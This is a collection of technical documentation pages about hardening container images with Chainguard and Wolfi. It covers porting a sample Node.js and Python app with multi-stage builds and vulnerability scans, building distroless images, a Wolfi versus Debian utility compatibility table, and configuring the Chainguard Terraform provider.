We've added an AS build statement to the first FROM line and added a second build stage that starts on the line FROM cgr.dev/chainguard/wolfi-base. The second stage installs the required dependencies (including Node.js) before copying the build artifacts from the first stage. We also changed the entrypoint to execute Node directly, as the container image no longer contains npm. Build and investigate the image:

docker build --pull -t dnmonster-multi .
…

docker images dnmonster-multi
REPOSITORY        TAG      IMAGE ID       CREATED         SIZE
dnmonster-multi   latest   a2efea945fb9   2 minutes ago   620MB

grype dnmonster-multi
 ✔ Loaded image        dnmonster-multi:latest
 ✔ Parsed image        sha256:08c8f2b6f0bc8b55a5962abfb9daaee9030fc37c19875592ea53f896f29a4c60
 ✔ Cataloged contents  37c6abd0a832ad48e4a604a392d6ebbea1a7483ddedf94b7762186de9e991cff
   ├── ✔ Packages                        [343 packages]
   ├── ✔ File digests                    [8,887 files]
   ├── ✔ File metadata                   [8,887 locations]
   └── ✔ Executables                     [601 executables]
 ✔ Scanned for vulnerabilities     [0 vulnerability matches]
   ├── by severity: 0 critical, 0 high, 0 medium, 0 low, 0 negligible
   └── by status:   0 fixed, 0 not-fixed, 0 ignored
No vulnerabilities found

This results in a container image that is now 620MB in size and has 0 CVEs. We're most of the way now, but there are still a couple of finishing touches to make. The first one is to remove the dnmonster user. The wolfi-base image already defines a nonroot user, so we can make the build a little less complicated by using that user directly. The second one is to add in a process manager. We have node running as the root process (PID 1) in the container, which isn't ideal as it doesn't handle some of the responsibilities that come with running as PID 1, such as forwarding signals to subprocesses. You can see this most clearly when you try to stop the container – it takes several seconds as the process doesn't respond to the SIGTERM signal sent by Docker and has to be hard killed with SIGKILL. To fix this, we can add tini, a small init for containers. The tini binary will run as PID 1, launch the node process as a subprocess, and take care of PID 1 responsibilities.
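If you want to see the signal problem for yourself before adding tini, you can time how long Docker takes to stop the current image. This is an illustrative sketch; the container name is arbitrary and the delay corresponds to Docker's default 10-second stop grace period:

# Start the multi-stage image built above and time a graceful stop.
docker run -d --name dnmonster-stop-test -p 8080:8080 dnmonster-multi
time docker stop dnmonster-stop-test   # hangs for ~10s, then Docker falls back to SIGKILL
docker rm dnmonster-stop-test

# After switching the entrypoint to tini, the same stop should return
# almost immediately because SIGTERM is forwarded to the node process.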
Now, the final Dockerfile looks like this:

FROM cgr.dev/chainguard/node:latest-dev AS build
USER root
RUN apk update && apk add \
    cairo-dev libjpeg-turbo-dev pango-dev giflib-dev python3 make gcc \
    librsvg-dev glib-dev harfbuzz-dev fribidi-dev expat-dev libxft-dev \
    libfontconfig1

RUN mkdir -p /usr/src/app
WORKDIR /usr/src/app
ENV NODE_ENV production
COPY package.json /usr/src/app/
RUN npm install
COPY ./src /usr/src/app

FROM cgr.dev/chainguard/wolfi-base
RUN apk update && apk add tini nodejs \
    cairo-dev libjpeg-turbo-dev pango-dev giflib-dev \
    librsvg-dev glib-dev harfbuzz-dev fribidi-dev expat-dev libxft-dev
WORKDIR /app
COPY --from=build /usr/src/app /app
EXPOSE 8080
ENTRYPOINT ["tini", "--"]
CMD [ "node", "server.js" ]

This version is also available in the main branch of the repository. Build it:

docker build --pull -t dnmonster-final .
…

And run it to prove it still works:

docker run -d -p 8080:8080 dnmonster-final
...
curl --output ./monster.png 'localhost:8080/monster/wolfi?size=100'

Note: If you receive a "port is already allocated" error, be sure to clean up the previous container. Check what containers are running with docker container ls and remove it with docker rm -f <container-name>.

There are still more tweaks that could be made. Bret Fisher has some excellent resources on building Node.js containers in this GitHub repo. But for the purposes of this example app, we've made excellent progress.

Updating the Python Microservice

The next service we will look at updating is Identidock, the main entrypoint for the application. Identidock is responsible for looking up requests in the cache and falling back to calling the dnmonster service if they're not present. Again, the version of the code on the v1 branch already contains a few updates from the original code, but in this case all that was needed was to bump various libraries to newer versions. The Dockerfile for the v1 version can be found in the identidock folder and looks like:

FROM python
RUN groupadd -r uwsgi && useradd -r -g uwsgi uwsgi
RUN pip install Flask==3.1.0 uWSGI requests==2.32.3 redis==5.2.1
WORKDIR /app
USER uwsgi
COPY app /app
COPY cmd.sh /
EXPOSE 9090 9191
CMD ["/cmd.sh"]

The image can be built with the following, assuming the current directory is the root of the repo:

cd identidock
docker build --pull -t identidock .
…

Inspect the container image:

docker images identidock
REPOSITORY   TAG      IMAGE ID       CREATED          SIZE
identidock   latest   a718358590ff   11 seconds ago   1.51GB

Scan for vulnerabilities:

grype docker:identidock
 ✔ Loaded image        identidock:latest
 ✔ Parsed image        sha256:0b4ac715984206f1e9134aa48a8efeba88e7badc3969d6f8c79cca98b47df676
 ✔ Cataloged contents  5ebeaac39f8f941d41629fdb1e13c39bc73558caadfe7699963b4b3a6c55a222
   ├── ✔ Packages                        [452 packages]
   ├── ✔ File digests                    [20,129 files]
   ├── ✔ File metadata                   [20,129 locations]
   └── ✔ Executables                     [1,428 executables]
 ✔ Scanned for vulnerabilities     [621 vulnerability matches]
   ├── by severity: 7 critical, 100 high, 296 medium, 47 low, 515 negligible (200 unknown)
   └── by status:   2 fixed, 1163 not-fixed, 544 ignored

At the time of writing, this container image is 1.51GB with hundreds of vulnerabilities (7 critical) according to Grype. Again, as a first step, we will try switching directly to the Chainguard Container. To do this, edit the Dockerfile so the first line reads:

FROM cgr.dev/chainguard/python:latest-dev

Before building the image, we also need to update the groupadd syntax to use the addgroup format.
As Chainguard Containers don't run as root by default for security reasons, we also need to change to the root user for this command to work. Replace the RUN groupadd line with the lines:

USER root
RUN addgroup uwsgi && adduser -D -G uwsgi uwsgi

The image now builds, but there are issues due to differences in the image entrypoint. If you run the container image, you will get a confusing error message such as:

File "/cmd.sh", line 4
    if [ "$ENV" = 'DEV' ]; then
         ^^^^^^
SyntaxError: cannot assign to literal here. Maybe you meant '==' instead of '='?

This is caused by the Chainguard Containers using /usr/bin/python as the entrypoint, which means the cmd.sh entrypoint script is interpreted by Python instead of the shell. Fixing this can be as easy as changing the entrypoint, but let's take a look at the script first. This is the file cmd.sh in the identidock directory:

#!/bin/bash
set -e

if [ "$ENV" = 'DEV' ]; then
  echo "Running Development Server"
  exec python "/app/identidock.py"
elif [ "$ENV" = 'UNIT' ]; then
  echo "Running Unit Tests"
  exec python "tests.py"
else
  echo "Running Production Server"
  exec uwsgi --http 0.0.0.0:9090 --wsgi-file /app/identidock.py \
    --callable app --stats 0.0.0.0:9191
fi

This script decides how to run the application depending on how the ENV environment variable is set. The idea here is to allow us to use the same image in development, testing, and production. This approach is no longer recommended as it leads to development tooling being present in the production environment. Even though the development tooling isn't run in production, it is still bloating the image and is potentially exploitable by attackers. Therefore, we will use a different approach and break the Dockerfile into separate development and production images.

Let's skip to the final Dockerfile for our image and walk through the changes made. These changes address multiple issues, beyond just having multiple images, and are based on the Chainguard Academy guide to Python images. Replace the Dockerfile with this one (this is also available on the "main" branch):

FROM cgr.dev/chainguard/python:latest-dev AS dev
ENV LANG=C.UTF-8
ENV PYTHONDONTWRITEBYTECODE=1
ENV PYTHONUNBUFFERED=1
ENV PATH="/app/venv/bin:$PATH"
WORKDIR /app
RUN python -m venv /app/venv
COPY requirements.txt ./
RUN pip install --no-cache-dir -r requirements.txt
COPY app /app
EXPOSE 5000
ENTRYPOINT ["python"]
CMD ["identidock.py"]

FROM cgr.dev/chainguard/python
WORKDIR /app
ENV PYTHONUNBUFFERED=1
ENV PATH="/app/venv/bin:$PATH"
COPY app/identidock.py ./
COPY --from=dev /app/venv /app/venv
EXPOSE 9090
ENTRYPOINT [ "gunicorn", "-b", "0.0.0.0:9090", "identidock:app" ]

And add the file requirements.txt to the current directory (identidock) with the following contents:

Flask==3.1.0
requests==2.32.3
redis==5.2.1
gunicorn==23.0.0

The first thing to notice is that we have a multistage build now. If you want the development container image rather than the production one, you can specify it during docker build:

docker build --pull --target dev -t identidock:dev .

Otherwise, you will get the standard variant only. There are several more environment variables defined. These prevent the creation of Python bytecode and buffering of output. For more detail on why this is useful, see the blog PYTHONDONTWRITEBYTECODE and PYTHONUNBUFFERED Explained. The installation of pip modules has moved to the requirements.txt file. The main thinking here is that we don't need to update the Dockerfile each time a dependency is updated or changed.
The development server runs on port 5000, while the production server runs on port 9090. We could edit this so they both run on the same port, but this approach reduces the chance of accidentally running the development server in production. The development server is started directly from the entrypoint, so we are no longer dependent on an entrypoint script, simplifying our architecture. To get a minimal, clean production install, we are using a Python virtual environment (venv) in the development image to isolate all dependencies, which are then copied over to the production image. Finally, the production image has been changed to use gunicorn, as uwsgi has entered "maintenance mode".

Build the final image:

docker build --pull -t identidock-cg .

And take a look at it:

docker images identidock-cg
REPOSITORY      TAG      IMAGE ID       CREATED          SIZE
identidock-cg   latest   1b5689af14a1   14 seconds ago   122MB

Run a scan with grype:

grype docker:identidock-cg
 ✔ Loaded image        identidock-cg:latest
 ✔ Parsed image        sha256:c79295258a2b67f2a0eda49c41a2d791888df6cc7b3bdea694d810ec5d2916d8
 ✔ Cataloged contents  6c8262ac152209ef3e36cad9c49c0d3e3f16d7cbfeafad9abb569c7690c68c2e
   ├── ✔ Packages                        [45 packages]
   ├── ✔ File digests                    [1,667 files]
   ├── ✔ File metadata                   [1,667 locations]
   └── ✔ Executables                     [135 executables]
 ✔ Scanned for vulnerabilities     [1 vulnerability matches]
   ├── by severity: 0 critical, 0 high, 0 medium, 0 low, 0 negligible (1 unknown)
   └── by status:   0 fixed, 1 not-fixed, 0 ignored
NAME          INSTALLED   FIXED-IN   TYPE   VULNERABILITY   SEVERITY
python-3.13   3.13.1-r5              apk    CVE-2025-0938   Unknown

The result of all these changes is that the production image is only 122 MB (down from 1.51GB, so an enormous saving of over a GB) and has 1 CVE (down from hundreds). This is a huge improvement! Further information on using Chainguard Containers with Python can be found in our Getting Started guide.

Replacing the Redis Container and Updating the Docker Compose File

Updating Redis is straightforward. We're not making any changes to the application image, so all we need to do is directly update the reference to redis:7 in the Docker Compose file to cgr.dev/chainguard/redis. The new container image requires no extra configuration, but we go from a 195 MB image with 129 vulnerabilities to a 33 MB image with 0 CVEs (again according to Grype). To update Compose, in the top level directory of the repo, replace the content of the docker-compose.yml file with the following:

name: identidock
services:
  frontend:
    build: identidock
    ports:
      - "9090:9090"
  dnmonster:
    build: dnmonster
  redis:
    image: cgr.dev/chainguard/redis

If you now run docker compose up --build, you should have a working application that can be reached on port 9090:

[Screenshot of running application]

There are some differences between this version and the original. The environment variable used for switching between image variants has been removed and the ports have changed to reflect the port used by gunicorn. This Compose file doesn't currently contain support for a development workflow – ideally we would be able to quickly iterate on our code without building a new image. The original file used volumes to achieve this, but this isn't something we want to do with the production image. One solution is to have a separate development Compose file, which will build the development image and use a volume to mount code at runtime for immediate feedback; a sketch of this approach follows below. New versions of Docker also support Compose Watch, which can be a more efficient and granular solution than volume mounts.
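As a rough sketch of that development workflow (the override file name, the bind-mounted path, and the assumption that identidock.py's development server listens on 0.0.0.0:5000 are ours, not part of the original repository), you could layer a development override on top of the production Compose file:

# docker-compose.dev.yml is a hypothetical override file; adjust paths to your checkout.
cat > docker-compose.dev.yml <<'EOF'
services:
  frontend:
    build:
      context: identidock
      target: dev          # build the development stage of the Dockerfile
    ports:
      - "5000:5000"        # development server port
    volumes:
      # Mount just the application file so the venv baked into the image
      # is not hidden by the bind mount.
      - ./identidock/app/identidock.py:/app/identidock.py
EOF

# Layer the override on top of the production file:
docker compose -f docker-compose.yml -f docker-compose.dev.yml up --build

The same idea can be expressed with a develop/watch section in the override file if you prefer Compose Watch over bind mounts.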
See What is Docker Compose Watch and what problem does it solve? for an introductory tutorial on using Compose Watch. Conclusion Porting our application to Chainguard Containers was relatively straightforward. There were some gotchas around differences to other images, such as different entrypoint settings and names for packages. The largest part of the puzzle was moving from single image builds to multistage builds that take advantage of the minimal Chainguard runtime images for Python and NodeJS. Once all this was done, we ended up with a much smaller set of images and with a drastically reduced number of CVEs. Cleaning Up To clean up the resources used in this guide, first stop any containers started by Compose: docker-compose down Then check docker ps to see if any containers are still running and stop them with docker stop <id>. You can then remove any container images you’ve built: docker rmi -f dnmonster dnmonster-cg dnmonster-multi identidock identidock:dev identidock-cg --- ### Getting Started with Distroless Container Images URL: https://edu.chainguard.dev/chainguard/chainguard-images/about/getting-started-distroless/ Last Modified: April 8, 2025 Tags: Chainguard Containers, Product, Overview About Distroless Container Images Distroless container images are a type of container image that is designed to be minimal. Unlike traditional images based on Debian or Ubuntu — which include package managers, utilities, and shells — distroless images typically contain only essential software required to run an application or service. This minimal approach offers several benefits, including: Enhanced Security: By stripping out unnecessary components, distroless images reduce the potential attack surface for vulnerabilities. With fewer extraneous programs, there are fewer opportunities for malicious actors to exploit. Simplified Dependency Management: Traditional container images can introduce dependency bloat, making it difficult to track and manage exactly what’s included. Distroless images keep things clear by only containing what’s directly required for the application to function. Potentially Smaller Image Sizes: By eliminating extraneous OS components, distroless images can be significantly smaller than their full-blown counterparts. Chainguard offers a mix of distroless and container images, which are minimalist and contain provenance attestations for increased security, and development (or -dev) images, which feature development tools like a shell or package manager. Since distroless images have fewer tools and don’t come with a package manager, some adaptation might be necessary when migrating from traditional base images. A typical approach is using multi stage builds to compose a final distroless image containing the additional artifacts required by the application in order to run successfully. Multi Stage Builds A multi stage build is a technique for creating slimmer and more efficient container images. It allows you to define multiple stages within a single Dockerfile. Each stage acts like a separate build environment with its own base image and instructions. The key benefit of multi stage builds is that they enable you to separate the build process from the final runtime environment. 
This separation helps in reducing the final image size by:

- Using different base images: You can leverage a larger image containing all the build tools in the initial stage and then switch to a smaller, leaner base image for the final stage that only includes the necessary runtime dependencies for your application.
- Excluding unnecessary layers: By separating the build and runtime stages, you can exclude all the temporary files, build tools, and intermediate artifacts from the final image. These elements are only required during the build process and not needed when running the application.

Overall, multi stage builds promote efficient container images by minimizing their size and optimizing their contents for execution.

Example 1: Distroless images as runtime for static binaries

Distroless images are typically designed to work as platforms for running workloads in as minimal an environment as possible. In the case of languages that can compile completely static binaries (such as C and Rust), the static base image can be used as a runtime. You'll still need to get your application compiled in a separate build stage that has the tooling necessary to build it. In this example, we'll build a distroless image to run a "Hello World" program in C. Start by creating a directory for the demo. We'll call it distroless-demo.

mkdir ~/distroless-demo && cd $_

Create a new Dockerfile within this directory. You can use nano or another command line editor of your choice.

nano Dockerfile

The following Dockerfile will build a final distroless image using two distinct build stages. The first stage, named build, builds a C program using the cgr.dev/chainguard/gcc-glibc:latest image. The final image, which is then based on the cgr.dev/chainguard/static:latest distroless image, will copy the compiled binary from the build environment and define it as the entry point command for the final image.

# syntax=docker/dockerfile:1.4
FROM cgr.dev/chainguard/gcc-glibc:latest AS build

COPY <<EOF /hello.c
#include <stdio.h>
int main() { printf("Hello Distroless!%c",0x0A); }
EOF

RUN cc -static /hello.c -o /hello

FROM cgr.dev/chainguard/static:latest
COPY --from=build /hello /hello
CMD ["/hello"]

Run the following command to build the demo image and tag it as c-distroless:

DOCKER_BUILDKIT=1 docker build -t c-distroless .

If you receive an error, you may try removing the top line of the Dockerfile. Now you can run the image with:

docker run c-distroless

You should get output like this:

Hello Distroless!

You can note the size of the resulting image.

docker images c-distroless
REPOSITORY     TAG      IMAGE ID       CREATED          SIZE
c-distroless   latest   cd3bb76a84f5   45 seconds ago   2.04MB

If you look into the image layers with docker inspect c-distroless, you'll also notice that it has only two layers: a single layer from the static image that serves as base for the final image, and one layer with the COPY command that brings in the compiled binary from the build stage.

"RootFS": {
    "Type": "layers",
    "Layers": [
        "sha256:cfc10a76380242be256af62b8782e536770dee83dcc823fce6c196c1ef5638e5",
        "sha256:bc7690d8bd810d969e6601d8468b4ae42fa411dfe460440e96092db454d80080"
    ]
},

Example 2: Incorporating Application-Level Dependencies in Distroless Images

When working with language ecosystems that have their own dependency management tools such as PHP (Composer) and Node (npm), a multi stage build is necessary to include application dependencies within the final distroless runtime.
The next example creates a Dockerfile to run a demo PHP application that has third-party dependencies managed by Composer. The application is a single executable that queries the cat facts API and returns a random fact. Start by creating a directory for the demo. We'll call it distroless-php.

mkdir ~/distroless-php && cd $_

The following command will create a new composer.json file with a single dependency, a small curl library called minicli/curly. We are using a shared volume so that the vendor folder is shared with our local directory.

docker run --rm --entrypoint composer --user=root -v ${PWD}:/app cgr.dev/chainguard/php:latest-dev require minicli/curly

In this case, we had to use the root image user in order to be able to write files in the current host directory. The following command will fix file permissions for our current system user:

sudo chown -R ${USER}:${USER} .

Now create the PHP executable. You can call it catfact.php:

nano catfact.php

The following code makes a query to the cat facts API, returning the quote as output. Copy the contents to your own catfact.php script:

<?php

require __DIR__ . '/vendor/autoload.php';

$curly = new Minicli\Curly\Client();

$response = $curly->get("https://catfact.ninja/fact");

if ($response['code'] === 200) {
    echo "\n" . json_decode($response['body'], true)['fact'] . "\n";
    return 0;
}

echo "query error.";
return 1;

Save the file when you're done. Now you can create your Dockerfile.

nano Dockerfile

The following Dockerfile uses a builder stage to install the Composer dependencies we just added, then copies the application into a distroless PHP image that runs the catfact.php script as its entrypoint.

FROM cgr.dev/chainguard/php:latest-dev AS builder
USER root
COPY . /app
RUN chown -R php /app

USER php
RUN cd /app && \
    composer install --no-progress --no-dev --prefer-dist

FROM cgr.dev/chainguard/php:latest
COPY --from=builder /app /app

ENTRYPOINT [ "php", "/app/catfact.php" ]

Now you can build the image with:

docker build . -t distroless-demo-php

Finally, you can run the new app with:

docker run --rm distroless-demo-php

And you should get a cat fact as output, such as:

A domestic cat can run at speeds of 30 mph.

Upon inspection with docker images, you can check that the image size is around 38MB:

❯ docker images distroless-demo-php
REPOSITORY            TAG      IMAGE ID       CREATED         SIZE
distroless-demo-php   latest   8691d09f56ca   2 minutes ago   37.9MB

For comparison, the php:cli-alpine image is almost 3 times bigger:

❯ docker images php:cli-alpine
REPOSITORY   TAG          IMAGE ID       CREATED      SIZE
php          cli-alpine   7879e816aba0   6 days ago   104MB

Final Considerations

Distroless images offer a compelling approach to creating minimal and secure container images by stripping away system components that are unnecessary at execution time, such as package managers and shells. While such images offer many advantages, they might require some adjustments in your existing development and deployment workflows. In this guide we demonstrated how to use multi stage builds to create final distroless images that include additional components, such as static binaries and application-level dependencies. You can find more examples in our Getting Started Guides page. Check also our article on Debugging Distroless Images for important tips when you run into issues and need to debug containers running distroless images.
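As a quick, illustrative sanity check that the runtime image really is distroless, you could try overriding its entrypoint with a shell; since no shell ships in the final image, the command should fail rather than drop you into a prompt:

docker run --rm --entrypoint sh distroless-demo-php
# Expected to fail with an error along the lines of:
#   exec: "sh": executable file not found in $PATH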
--- ### Debian Compatibility URL: https://edu.chainguard.dev/chainguard/migration/compatibility/debian-compatibility/ Last Modified: March 8, 2024 Tags: Chainguard Containers, Product, Reference Chainguard Containers and Debian base images have different binaries and scripts included in their respective busybox and coreutils packages. The following table lists common tools and their corresponding package(s) in both Wolfi and Debian distributions. Note that $PATH locations like /usr/bin or /sbin are not included here. If you have compatibility issues with tools that are included in both busybox and coreutils, be sure to check $PATH order and confirm which version of a tool is being run. Generally, if a tool exists in busybox but does not have a coreutils counterpart, there will be a specific package that includes it. For example the zcat utility is included in the gzip package in both Wolfi and Debian. You can use the apk search command in Wolfi, and the apt-cache search command in Debian to find out which package includes a tool. Utility Wolfi busybox Debian busybox Wolfi coreutils Debian coreutils [ ✅ ✅ ✅ ✅ [[ ✅ ✅ acpid ✅ add-shell ✅ addgroup ✅ adduser ✅ adjtimex ✅ ✅ ar ✅ arch ✅ ✅ ✅ arp ✅ arping ✅ ✅ ascii ✅ ash ✅ ✅ awk ✅ ✅ b2sum ✅ ✅ base32 ✅ ✅ base64 ✅ ✅ ✅ ✅ basename ✅ ✅ ✅ ✅ basenc ✅ ✅ bbconfig ✅ bc ✅ ✅ beep ✅ bin ✅ blkdiscard ✅ blkid ✅ blockdev ✅ brctl ✅ bunzip2 ✅ ✅ bzcat ✅ ✅ bzip2 ✅ ✅ cal ✅ ✅ cat ✅ ✅ ✅ ✅ chattr ✅ chcon ✅ ✅ chgrp ✅ ✅ ✅ ✅ chmod ✅ ✅ ✅ ✅ chown ✅ ✅ ✅ ✅ chpasswd ✅ chroot ✅ ✅ ✅ ✅ chrt ✅ chvt ✅ cksum ✅ ✅ ✅ clear ✅ ✅ cmp ✅ ✅ comm ✅ ✅ ✅ coreutils ✅ cp ✅ ✅ ✅ ✅ cpio ✅ ✅ crc32 ✅ cryptpw ✅ csplit ✅ ✅ cttyhack ✅ cut ✅ ✅ ✅ ✅ date ✅ ✅ ✅ ✅ dc ✅ ✅ dd ✅ ✅ ✅ ✅ deallocvt ✅ delgroup ✅ deluser ✅ depmod ✅ devmem ✅ df ✅ ✅ ✅ ✅ diff ✅ ✅ dir ✅ ✅ dircolors ✅ ✅ dirname ✅ ✅ ✅ ✅ dmesg ✅ ✅ dnsdomainname ✅ ✅ dos2unix ✅ ✅ du ✅ ✅ ✅ ✅ dumpkmap ✅ dumpleases ✅ echo ✅ ✅ ✅ ✅ ed ✅ egrep ✅ ✅ env ✅ ✅ ✅ ✅ expand ✅ ✅ ✅ ✅ expr ✅ ✅ ✅ ✅ factor ✅ ✅ ✅ ✅ fallocate ✅ ✅ false ✅ ✅ ✅ ✅ fatattr ✅ fdisk ✅ fgrep ✅ ✅ find ✅ ✅ findfs ✅ ✅ flock ✅ fmt ✅ ✅ fold ✅ ✅ ✅ ✅ free ✅ ✅ freeramdisk ✅ fsfreeze ✅ fstrim ✅ fsync ✅ ftpget ✅ ftpput ✅ fuser ✅ getopt ✅ ✅ getty ✅ ✅ grep ✅ ✅ groups ✅ ✅ ✅ gunzip ✅ ✅ gzip ✅ ✅ halt ✅ hd ✅ head ✅ ✅ ✅ ✅ hexdump ✅ ✅ hostid ✅ ✅ ✅ ✅ hostname ✅ ✅ httpd ✅ hwclock ✅ i2cdetect ✅ i2cdump ✅ i2cget ✅ i2cset ✅ i2ctransfer ✅ id ✅ ✅ ✅ ✅ ifconfig ✅ ifdown ✅ ifup ✅ init ✅ inotifyd ✅ insmod ✅ install ✅ ✅ ✅ ionice ✅ ✅ iostat ✅ ip ✅ ipcalc ✅ ipcrm ✅ ipcs ✅ ipneigh ✅ join ✅ ✅ kill ✅ ✅ killall ✅ ✅ killall5 ✅ klogd ✅ last ✅ less ✅ ✅ link ✅ ✅ ✅ ✅ linux32 ✅ ✅ linux64 ✅ ✅ linuxrc ✅ ln ✅ ✅ ✅ ✅ loadfont ✅ loadkmap ✅ logger ✅ ✅ login ✅ ✅ logname ✅ ✅ ✅ logread ✅ losetup ✅ ls ✅ ✅ ✅ ✅ lsattr ✅ lsmod ✅ lsof ✅ lsscsi ✅ lzcat ✅ ✅ lzma ✅ ✅ lzop ✅ ✅ lzopcat ✅ md5sum ✅ ✅ ✅ ✅ md5sum.textutils ✅ mdev ✅ microcom ✅ ✅ mim ✅ mkdir ✅ ✅ ✅ ✅ mkdosfs ✅ mke2fs ✅ mkfifo ✅ ✅ ✅ ✅ mknod ✅ ✅ ✅ ✅ mkpasswd ✅ ✅ mkswap ✅ mktemp ✅ ✅ ✅ ✅ modinfo ✅ modprobe ✅ more ✅ ✅ mount ✅ mountpoint ✅ mpstat ✅ mt ✅ mv ✅ ✅ ✅ ✅ nameif ✅ nc ✅ netstat ✅ ✅ nice ✅ ✅ ✅ nl ✅ ✅ ✅ ✅ nmeter ✅ nohup ✅ ✅ ✅ nologin ✅ ✅ nproc ✅ ✅ ✅ ✅ nsenter ✅ ✅ nslookup ✅ nuke ✅ numfmt ✅ ✅ od ✅ ✅ ✅ ✅ openvt ✅ partprobe ✅ passwd ✅ paste ✅ ✅ ✅ ✅ patch ✅ pathchk ✅ ✅ pgrep ✅ pidof ✅ ✅ ping ✅ ✅ ping6 ✅ ✅ pinky ✅ ✅ pipe_progress ✅ pivot_root ✅ ✅ pkill ✅ pmap ✅ poweroff ✅ pr ✅ ✅ printenv ✅ ✅ ✅ printf ✅ ✅ ✅ ✅ ps ✅ ✅ pstree ✅ ptx ✅ ✅ pwd ✅ ✅ ✅ ✅ pwdx ✅ rdate ✅ rdev ✅ readahead ✅ readlink ✅ ✅ ✅ ✅ realpath ✅ ✅ ✅ ✅ reboot ✅ remove-shell ✅ renice ✅ ✅ reset ✅ ✅ resize ✅ resume ✅ rev ✅ ✅ rm ✅ ✅ ✅ ✅ rmdir ✅ ✅ ✅ ✅ rmmod ✅ 
route ✅ rpm ✅ rpm2cpio ✅ run-init ✅ run-parts ✅ ✅ runcon ✅ ✅ sbin ✅ sed ✅ ✅ seq ✅ ✅ ✅ ✅ setkeycodes ✅ setpriv ✅ ✅ setserial ✅ setsid ✅ ✅ sh ✅ ✅ sha1sum ✅ ✅ ✅ ✅ sha224sum ✅ ✅ sha256sum ✅ ✅ ✅ ✅ sha384sum ✅ ✅ sha3sum ✅ ✅ sha512sum ✅ ✅ ✅ ✅ shred ✅ ✅ ✅ ✅ shuf ✅ ✅ ✅ ✅ sleep ✅ ✅ ✅ ✅ sort ✅ ✅ ✅ ✅ split ✅ ✅ ✅ ssl_client ✅ start-stop-daemon ✅ stat ✅ ✅ ✅ ✅ stdbuf ✅ ✅ strings ✅ ✅ stty ✅ ✅ ✅ ✅ su ✅ sum ✅ ✅ ✅ svc ✅ svok ✅ swapoff ✅ swapon ✅ switch_root ✅ sync ✅ ✅ ✅ ✅ sysctl ✅ ✅ syslogd ✅ tac ✅ ✅ ✅ ✅ tail ✅ ✅ ✅ ✅ tar ✅ ✅ taskset ✅ tee ✅ ✅ ✅ ✅ telnet ✅ test ✅ ✅ ✅ ✅ tftp ✅ time ✅ ✅ timeout ✅ ✅ ✅ ✅ top ✅ ✅ touch ✅ ✅ ✅ ✅ tr ✅ ✅ ✅ ✅ traceroute ✅ ✅ traceroute6 ✅ ✅ tree ✅ true ✅ ✅ ✅ ✅ truncate ✅ ✅ ✅ ✅ ts ✅ tsort ✅ ✅ ✅ tty ✅ ✅ ✅ ✅ ttysize ✅ tunctl ✅ ubirename ✅ udhcpc ✅ udhcpd ✅ uevent ✅ umount ✅ uname ✅ ✅ ✅ ✅ uncompress ✅ unexpand ✅ ✅ ✅ ✅ uniq ✅ ✅ ✅ ✅ unix2dos ✅ ✅ unlink ✅ ✅ ✅ ✅ unlzma ✅ ✅ unlzop ✅ unshare ✅ unxz ✅ ✅ unzip ✅ ✅ uptime ✅ ✅ users ✅ ✅ usleep ✅ ✅ usr ✅ uudecode ✅ ✅ uuencode ✅ ✅ vconfig ✅ ✅ vdir ✅ ✅ vi ✅ ✅ vlock ✅ w ✅ watch ✅ ✅ watchdog ✅ wc ✅ ✅ ✅ ✅ wget ✅ which ✅ ✅ who ✅ ✅ ✅ ✅ whoami ✅ ✅ ✅ ✅ xargs ✅ ✅ xxd ✅ ✅ xz ✅ xzcat ✅ ✅ yes ✅ ✅ ✅ ✅ zcat ✅ ✅ --- ### Introduction to the Chainguard Terraform Provider URL: https://edu.chainguard.dev/chainguard/administration/terraform-provider/ Last Modified: May 9, 2024 Tags: Product, Overview Terraform is an infrastructure as code tool that allows users to declaratively configure resources in cloud providers like AWS and GCP, SaaS platforms, and many other API-driven environments. Terraform providers are written by third-party developers to allow Terraform to manage resources in their environment. The Chainguard Terraform provider enables users to manage resources on the Chainguard Platform, such as identities, role-bindings, custom roles, and more. This guide provides a brief introduction to the Chainguard Terraform provider, including how to configure it and use it to manage your Chainguard resources. Prerequisites In order to use the Chainguard Terraform provider, you will need to install Terraform on your local machine. Also, while it isn’t necessary for using the Chainguard Terraform provider, this guide assumes you have chainctl installed in order to retrieve some information about your Chainguard resources. Configuring the Chainguard Terraform provider Terraform uses a native configuration language to define resources. Each configuration is stored in one or more .tf files, which in turn are stored in what is called a root module. When using the Terraform CLI, the root module is the working directory where you invoke terraform commands to create or destroy your resources. To use the Chainguard Terraform provider, add it to the block of required providers in your configuration: terraform { required_providers { chainguard = { source = "chainguard-dev/chainguard" } } } If you don’t have an active Chainguard token when you apply the configuration, the provider will automatically launch a browser to complete the Oauth 2 flow with one of the default identity providers: GitHub, GitLab, or Google. This means the Terraform provider does not require chainctl to be installed to manage authentication with Chainguard. You can customize the behavior of the authentication flow in a number of ways. For example, you can specify an identity to assume, or a verified organization name in order to use a previously-configured custom identity provider: provider "chainguard" { login_options { organization_name = "my-org.com" # identity_id is the exact ID of an assumable identity. 
# Get this ID with chainctl iam identities list
    identity_id = "1f127a7c0609329f04b43d845cf80eea4247a07c/d6305475446bbef6"
  }
}

You can also configure the provider to use an OIDC token, either by supplying it directly or pulling it from a file, with the automatic browser flow disabled. This is useful when setting up CI workflows:

provider "chainguard" {
  login_options {
    # Disable the automatic browser authentication flow.
    disabled = true
    identity_token = "/path/to/oidc/token"
  }
}

You can find more information about authenticating with the Chainguard Terraform provider in the provider documentation and the included examples.

Defining Organization References

Terraform was designed to allow users to manage various resources declaratively. In practice, this means that you define the state you want your resources to be in and then you let Terraform and the provider handle the details of bringing that state to reality. Resources on the Chainguard platform are organized in a hierarchical structure consisting of Organizations and Folders. An organization is a customer or group of customers working with the same Chainguard resources, while a folder is a collection of resources within a Chainguard organization. Most users will only need to work at the organization level. All user-managed resources are defined in relation to the organization to which they belong. This means developers need to be able to reference their organization throughout their configuration. We'll outline two ways to define this kind of reference: using local values and data sources. For more details on referencing an organization, please refer to the chainguard_group resource documentation.

Note: Chainguard organizations were previously called "groups," with a "root group" representing what is now referred to as an organization and "subgroups" referring to folders. As of this writing, the Chainguard Terraform provider still refers to "groups" instead of organizations. To align with our other IAM resources, this document uses the new nomenclature wherever possible.

Defining local values

The Terraform configuration language allows you to define local values which assign a name to a given expression. This allows you to reference the name of a local value multiple times throughout a Terraform configuration rather than repeating the expression each time. As an example, this section will outline how to define a local variable representing the ID of a Chainguard organization. If you are familiar with chainctl, you can find your organization's ID with the following command:

chainctl iam organizations list -o table

Once you've copied the UIDP of your organization (the 40-digit long hex string listed in the ID column of the previous command's output), you can use it to create a local variable in Terraform:

locals {
  org_id = "[organization UIDP]"
}

